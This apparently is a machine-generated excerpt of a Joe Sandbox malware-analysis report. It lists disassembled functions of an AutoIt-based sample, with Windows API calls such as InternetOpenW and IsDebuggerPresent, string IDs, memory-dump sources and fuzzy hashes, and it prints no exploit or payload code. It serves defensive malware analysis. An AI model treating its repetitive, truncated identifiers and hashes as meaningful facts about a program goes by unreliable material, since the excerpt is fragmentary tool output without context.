                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: CrackInternet_wcslen
                        • String ID: |
                        • API String ID: 596671847-2343686810
                        • Opcode ID: d144ad7c2e4a7e7571c1a20436125a829738618730a733bc9de992ce9d916c87
                        • Instruction ID: dca30546a671dffd4f758a1836ea74c7d21eb217e167a63187984ec19363ff21
                        • Opcode Fuzzy Hash: d144ad7c2e4a7e7571c1a20436125a829738618730a733bc9de992ce9d916c87
                        • Instruction Fuzzy Hash: 30313E71D01209ABCF15EFA4CC85BEEBFBAFF45300F100019F915AA262D735AA16DB60
                        Function 00A1356C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96COMMON
                        Download Yara Rule
                        APIs
                        • DestroyWindow.USER32(?,?,?,?), ref: 00A13621
                        • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00A1365C
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: Window$DestroyMove
                        • String ID: static
                        • API String ID: 2139405536-2160076837
                        • Opcode ID: 4edb1f9032a30c0e15d47d876e9d4295938d41098c7855c49a9b1f8ab3e9d6ea
                        • Instruction ID: 5c3dc9922f4cf7069d0f3f2a7f6be7e410f67e4e94f26c442fa293d8665f18f9
                        • Opcode Fuzzy Hash: 4edb1f9032a30c0e15d47d876e9d4295938d41098c7855c49a9b1f8ab3e9d6ea
                        • Instruction Fuzzy Hash: CF318B72100204AEEB20DF68DC80FFB73A9FF88764F109619F9A5D7280DA34AD91C760
                        Function 00A14537 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95windowCOMMON
                        Download Yara Rule
                        APIs
                        • SendMessageW.USER32(?,00001132,00000000,?), ref: 00A1461F
                        • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00A14634
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: MessageSend
                        • String ID: '
                        • API String ID: 3850602802-1997036262
                        • Opcode ID: 676c4212778e91a7b50c0cd6d434253573234cf6c95506a8c9e75ce641c39979
                        • Instruction ID: 713e75bd741dcaa68077471e73d1ad026711bd51f5a46315b95aec533a769edb
                        • Opcode Fuzzy Hash: 676c4212778e91a7b50c0cd6d434253573234cf6c95506a8c9e75ce641c39979
                        • Instruction Fuzzy Hash: 5D313974A0030A9FDF14CFA9C980BEA7BB6FF49314F14406AE914AB341E770A981CF90
                        Function 00A131EF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                        Download Yara Rule
                        APIs
                        • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00A1327C
                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00A13287
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: MessageSend
                        • String ID: Combobox
                        • API String ID: 3850602802-2096851135
                        • Opcode ID: 9f6ddc93ce1095729bfe6abe9496092d36deafa73576195e26b7ea893d19180a
                        • Instruction ID: 12a7bf44476d6009eea08d5cf31a3ea9026c1eb687e8d9f789410b8a65f5450b
                        • Opcode Fuzzy Hash: 9f6ddc93ce1095729bfe6abe9496092d36deafa73576195e26b7ea893d19180a
                        • Instruction Fuzzy Hash: B311B2723002087FEF21AF94DC81EFB376BEBA8364F104224F91897290D6759D918760
                        Function 00A13710 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 0098600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0098604C
                          • Part of subcall function 0098600E: GetStockObject.GDI32(00000011), ref: 00986060
                          • Part of subcall function 0098600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 0098606A
                        • GetWindowRect.USER32(00000000,?), ref: 00A1377A
                        • GetSysColor.USER32(00000012), ref: 00A13794
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: Window$ColorCreateMessageObjectRectSendStock
                        • String ID: static
                        • API String ID: 1983116058-2160076837
                        • Opcode ID: 7d539e73a6af233f88a44c9167b75b427ae77fcc131588b27203ecc729b85ba0
                        • Instruction ID: 497055a0972846b0a0ab5dbf46a0984ce57e5f1efed9d4b417fefc03616da5d1
                        • Opcode Fuzzy Hash: 7d539e73a6af233f88a44c9167b75b427ae77fcc131588b27203ecc729b85ba0
                        • Instruction Fuzzy Hash: 561137B2650209AFDF01DFA8CC46EFA7BB9FB08314F004914F956E3250E735E8519B60
                        Function 009FCD1E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66networkCOMMON
                        Download Yara Rule
                        APIs
                        • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 009FCD7D
                        • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 009FCDA6
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: Internet$OpenOption
                        • String ID: <local>
                        • API String ID: 942729171-4266983199
                        • Opcode ID: 057ec3b8073849f731d6b4b0a208deb20beadf58560fde38f88286f6ee313746
                        • Instruction ID: 9d54fcc444e37f216cab22bd51c3fc00645af49f46961c06e89a7bc60d46388d
                        • Opcode Fuzzy Hash: 057ec3b8073849f731d6b4b0a208deb20beadf58560fde38f88286f6ee313746
                        • Instruction Fuzzy Hash: 7A11A3B524563DBAD7244A668C45EFBBEADEF127B4F008626B219920C0D6749841D7F0
                        Function 00A13429 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
                        Download Yara Rule
                        APIs
                        • GetWindowTextLengthW.USER32(00000000), ref: 00A134AB
                        • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00A134BA
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: LengthMessageSendTextWindow
                        • String ID: edit
                        • API String ID: 2978978980-2167791130
                        • Opcode ID: 31f0719081022c01010433ec4ae8c57c9caae3452325f1e27e171e7918b0996f
                        • Instruction ID: 6cb7b416d82ca2fbc3d78acd288e5bc75a6d0053759e0e4cbca89968dbf1c57a
                        • Opcode Fuzzy Hash: 31f0719081022c01010433ec4ae8c57c9caae3452325f1e27e171e7918b0996f
                        • Instruction Fuzzy Hash: C211BC72100208AFEF228FA4DC80AFB37AAEB14375F504324FA61931E0C735DC919B60
                        Function 009E6C86 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00989CB3: _wcslen.LIBCMT ref: 00989CBD
                        • CharUpperBuffW.USER32(?,?,?), ref: 009E6CB6
                        • _wcslen.LIBCMT ref: 009E6CC2
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: _wcslen$BuffCharUpper
                        • String ID: STOP
                        • API String ID: 1256254125-2411985666
                        • Opcode ID: 946602ac946db867b2eb9aab9a792f9fd85efbba3fa5b306b81eb30fb4dd7b84
                        • Instruction ID: 5141165263fd9d9cbdb1a0adc4ed5c898c555f6d03d0cf5778f137270389eaed
                        • Opcode Fuzzy Hash: 946602ac946db867b2eb9aab9a792f9fd85efbba3fa5b306b81eb30fb4dd7b84
                        • Instruction Fuzzy Hash: 4C0108326005668BCB12AFBECC409BF73A9FBB17907500924E59296191EB35DD40C750
                        Function 009E1CDE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00989CB3: _wcslen.LIBCMT ref: 00989CBD
                          • Part of subcall function 009E3CA7: GetClassNameW.USER32(?,?,000000FF), ref: 009E3CCA
                        • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 009E1D4C
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: ClassMessageNameSend_wcslen
                        • String ID: ComboBox$ListBox
                        • API String ID: 624084870-1403004172
                        • Opcode ID: 13696900de4357e6183eff7d274a3bb0ca4074fe5cd77c4c3c0960b2f197b165
                        • Instruction ID: 559968b71f1478cbc44710542eb9387b000dcde406864c5cb912d05a07cc53bd
                        • Opcode Fuzzy Hash: 13696900de4357e6183eff7d274a3bb0ca4074fe5cd77c4c3c0960b2f197b165
                        • Instruction Fuzzy Hash: 08014C35601218ABCB09FBA0CC15DFE73A8FF82350B144909F873673C1EA355D488760
                        Function 009E1BD8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00989CB3: _wcslen.LIBCMT ref: 00989CBD
                          • Part of subcall function 009E3CA7: GetClassNameW.USER32(?,?,000000FF), ref: 009E3CCA
                        • SendMessageW.USER32(?,00000180,00000000,?), ref: 009E1C46
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: ClassMessageNameSend_wcslen
                        • String ID: ComboBox$ListBox
                        • API String ID: 624084870-1403004172
                        • Opcode ID: 7aacff71a038eb6fb16d59b0b8c05e97fac6fe9d416232b36e842a8e169e5d3c
                        • Instruction ID: fa9e37dabf3401637e5912fc88b9e285e3ea2d571e89f712f7e146dfd4786f03
                        • Opcode Fuzzy Hash: 7aacff71a038eb6fb16d59b0b8c05e97fac6fe9d416232b36e842a8e169e5d3c
                        • Instruction Fuzzy Hash: C401A775B811446BCB05FBA1C956AFF77AC9B91340F240419B896B7282EA35DE0887B1
                        Function 009E1C5C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00989CB3: _wcslen.LIBCMT ref: 00989CBD
                          • Part of subcall function 009E3CA7: GetClassNameW.USER32(?,?,000000FF), ref: 009E3CCA
                        • SendMessageW.USER32(?,00000182,?,00000000), ref: 009E1CC8
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: ClassMessageNameSend_wcslen
                        • String ID: ComboBox$ListBox
                        • API String ID: 624084870-1403004172
                        • Opcode ID: 568958d1cbba6def9e44f3c83d0719d1f60de93cd65d49000d08bad516753ab5
                        • Instruction ID: e5de1a36ea898e03625c84afe2964dedcc3ce1c842e008f8ed43f63c861c200f
                        • Opcode Fuzzy Hash: 568958d1cbba6def9e44f3c83d0719d1f60de93cd65d49000d08bad516753ab5
                        • Instruction Fuzzy Hash: 2501D675A8115867CB06FBA1CA05BFE73ACAB51340F244415B886B3282FA359F09C771
                        Function 009E1D68 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46windowCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00989CB3: _wcslen.LIBCMT ref: 00989CBD
                          • Part of subcall function 009E3CA7: GetClassNameW.USER32(?,?,000000FF), ref: 009E3CCA
                        • SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 009E1DD3
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: ClassMessageNameSend_wcslen
                        • String ID: ComboBox$ListBox
                        • API String ID: 624084870-1403004172
                        • Opcode ID: fcc6ad2686ec9aeb2872207d3e7cdab3a15352145755b4e2e52bce1bb5f21dcd
                        • Instruction ID: c74acdc6b179fb066734a75a9677ee1fbdccf5b3e5afcbcb56d0de82e07bf040
                        • Opcode Fuzzy Hash: fcc6ad2686ec9aeb2872207d3e7cdab3a15352145755b4e2e52bce1bb5f21dcd
                        • Instruction Fuzzy Hash: 13F0FF71A412186BCB05F7A5CC56BFE73ACAB82350F080D19B862632C2EA759E088360
                        Function 00A0747E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: _wcslen
                        • String ID: 3, 3, 16, 1
                        • API String ID: 176396367-3042988571
                        • Opcode ID: da22ab3f3bcbc2c1f107a8556166e2c2d92ba3c33675a181932deded0f5ffb91
                        • Instruction ID: e6ebf7f3f18c8586d9e101c708f2ea7bd6c6b8fbfd3f707f97e23efb7ee615a6
                        • Opcode Fuzzy Hash: da22ab3f3bcbc2c1f107a8556166e2c2d92ba3c33675a181932deded0f5ffb91
                        • Instruction Fuzzy Hash: 3DE02B06A0426020D2311779BCC1A7F968DDFC6B90710182BF981C62A6EAE59DA193E1
                        Function 009E0B15 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28windowCOMMON
                        Download Yara Rule
                        APIs
                        • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 009E0B23
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: Message
                        • String ID: AutoIt$Error allocating memory.
                        • API String ID: 2030045667-4017498283
                        • Opcode ID: d4e3cf9945011ed5b225d462803c810e8dc7f7f17b80697e59d9e7e298577be6
                        • Instruction ID: 413addb2a7eb41789ccd7191bedac04940ff64777cc97fb06feae53a7b8a3071
                        • Opcode Fuzzy Hash: d4e3cf9945011ed5b225d462803c810e8dc7f7f17b80697e59d9e7e298577be6
                        • Instruction Fuzzy Hash: ECE0483528431837D61436957C03FC9BA899F46F61F204426F798955C38BD268D046E9
                        Function 009A0D42 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 0099F7C9: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,009A0D71,?,?,?,0098100A), ref: 0099F7CE
                        • IsDebuggerPresent.KERNEL32(?,?,?,0098100A), ref: 009A0D75
                        • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0098100A), ref: 009A0D84
                        Strings
                        • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 009A0D7F
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
                        • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                        • API String ID: 55579361-631824599
                        • Opcode ID: cfca32d5fcf74e3c23eec205faf79a4394f0ef263544e519ada15106ebedda12
                        • Instruction ID: 996ad6aa05a0780af460ff6faea6e99afe08ee884a56d076e3b5a1bc4bcaa9d0
                        • Opcode Fuzzy Hash: cfca32d5fcf74e3c23eec205faf79a4394f0ef263544e519ada15106ebedda12
                        • Instruction Fuzzy Hash: 77E06D742007418FD370EFB8D4083967BE4BB41750F00892DE486C6691DBB5E4898BD1
                        Function 009DD21C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17timeCOMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: LocalTime
                        • String ID: %.3d$X64
                        • API String ID: 481472006-1077770165
                        • Opcode ID: 4a36c87842faa10372e9a8e45bfb4089f14d5c383fe6eb3e6f6d138c514dc721
                        • Instruction ID: aa5e9a92214382bab3c297f72aaa409282226908dfb45ec5f8b943dca1c180c6
                        • Opcode Fuzzy Hash: 4a36c87842faa10372e9a8e45bfb4089f14d5c383fe6eb3e6f6d138c514dc721
                        • Instruction Fuzzy Hash: 6FD012A588A108FACF509AD0DC459F9B37CBB58341F50CC53FA16E2140D63CD509A761
                        Function 00A12322 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                        Download Yara Rule
                        APIs
                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00A1232C
                        • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00A1233F
                          • Part of subcall function 009EE97B: Sleep.KERNEL32 ref: 009EE9F3
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: FindMessagePostSleepWindow
                        • String ID: Shell_TrayWnd
                        • API String ID: 529655941-2988720461
                        • Opcode ID: ec4840a08b71d37bdc0d453fa15933740351100b2354408b3f9395a56d1b1c4a
                        • Instruction ID: 0f009ad5730e349dc4d0de18ffbf45ecc83de8fbde4da0d3e3f73832867fd680
                        • Opcode Fuzzy Hash: ec4840a08b71d37bdc0d453fa15933740351100b2354408b3f9395a56d1b1c4a
                        • Instruction Fuzzy Hash: 4CD022363C0300BBE264F3B0DC0FFC6BA05AB40B20F0089027305AA0D0C8F4A802CA04
                        Function 00A12356 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                        Download Yara Rule
                        APIs
                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00A1236C
                        • PostMessageW.USER32(00000000), ref: 00A12373
                          • Part of subcall function 009EE97B: Sleep.KERNEL32 ref: 009EE9F3
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
